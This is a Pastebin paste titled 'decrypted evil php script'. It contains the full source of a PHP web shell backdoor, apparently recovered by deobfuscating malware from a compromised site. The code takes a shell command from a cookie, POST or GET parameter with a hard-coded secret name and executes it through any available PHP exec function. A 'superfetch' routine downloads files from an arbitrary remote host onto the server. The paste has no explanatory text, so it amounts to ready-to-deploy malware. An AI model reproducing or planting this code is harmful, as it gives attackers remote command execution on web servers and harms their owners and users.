API tools faq
paste
Advertisement
Guest User

decrypted evil php script

a guest
Jan 6th, 2012
999
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.64 KB | None | 0 0
raw download clone embed print report
  1.  
  2. //adjust system variables
  3. if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}
  4. //die with error
  5. function x_die($m){@header('HTTP/1.1 500 '.$m);@die();}
  6. //check if we can exec
  7. define('has_passthru',@function_exists('passthru'));
  8. define('has_system',@function_exists('system'));
  9. define('has_shell_exec',@function_exists('shell_exec'));
  10. define('has_popen',@function_exists('popen'));
  11. define('has_proc_open',@function_exists('proc_open'));
  12. define('has_exec',@function_exists('exec'));
  13. define('can_exec',(has_passthru||has_system||has_shell_exec||has_popen||has_proc_open||has_exec));
  14. if(!can_exec){x_die('can not exec: no functions available');}
  15. //check if we can config
  16. define('has_ini_get',@function_exists('ini_get'));
  17. define('has_ini_get_all',@function_exists('ini_get_all'));
  18. define('can_config',(has_ini_get||has_ini_get_all));
  19. if(!can_config){x_die('can not config');}
  20. //get config value
  21. function x_ini_get($n){if(has_ini_get){return(@ini_get($n));}elseif(has_ini_get_all){$h=@ini_get_all();return($h[$n]['local_value']);}}
  22. // check safe mode
  23. if(x_ini_get('safe_mode')){x_die('can not exec: safe mode active');}
  24. //smart exec helpers
  25. function x_passthru($c){@passthru($c);}
  26. function x_system($c){@system($c);}
  27. function x_shell_exec($c){echo @shell_exec($c);}
  28. function x_popen($c){$o;if(($f=@popen($c,'r'))){while(!@feof($f)){$o.=@fgets($f);}@pclose($f);}echo $o;}
  29. function x_proc_open($c){$o;if(@is_resource($p=@proc_open($c,array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')),$f))){@fclose($f[0]);while(!@feof($f[1])){$o.=@fgets($f[1]);}@fclose($f[1]);@proc_close($p);}echo $o;}
  30. function x_exec($c){$o;@exec($c,$o);echo @implode("\n",$o);}
  31. //do smart fetch
  32. function x_superfetch($a,$p,$r,$l)
  33. {
  34.     if($s=@fsockopen($a,$p))
  35.     {
  36.         if($f=@fopen($l,"wb"))
  37.         {
  38.             @fwrite($s,"GET ".$r." HTTP/1.0\r\n\r\n");
  39.             while(!@feof($s))
  40.             {
  41.                 $b=@fread($s,8192);
  42.                 @fwrite($f,$b);
  43.             }
  44.             @fclose($f);
  45.             echo "OK\n";
  46.         }
  47.         @fclose($s);
  48.     }
  49. }
  50. //do smart exec
  51. function x_smart_exec($c)
  52. {
  53.     if($c==="which superfetch 1> /dev/null 2> /dev/null && echo OK")
  54.     {
  55.         echo "OK\n";
  56.     }
  57.     elseif(@strstr($c,"superfetch"))
  58.     {
  59.         $a=@explode(' ',$c);
  60.         x_superfetch($a[1],$a[2],$a[3],$a[4]);
  61.     }
  62.     elseif(has_passthru){x_passthru($c);}
  63.     elseif(has_system){x_system($c);}
  64.     elseif(has_shell_exec){x_shell_exec($c);}
  65.     elseif(has_popen){x_popen($c);}
  66.     elseif(has_proc_open){x_proc_open($c);}
  67.     elseif(has_exec){x_exec($c);}
  68. }
  69. //go
  70. $n='SjJVkE6rkRYj';
  71. $c=$_COOKIE[$n];
  72. if(@empty($c)){$c=$_POST[$n];}
  73. if(@empty($c)){$c=$_GET[$n];}
  74. if(@get_magic_quotes_gpc()){$c=stripslashes($c);}
  75. x_smart_exec($c);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!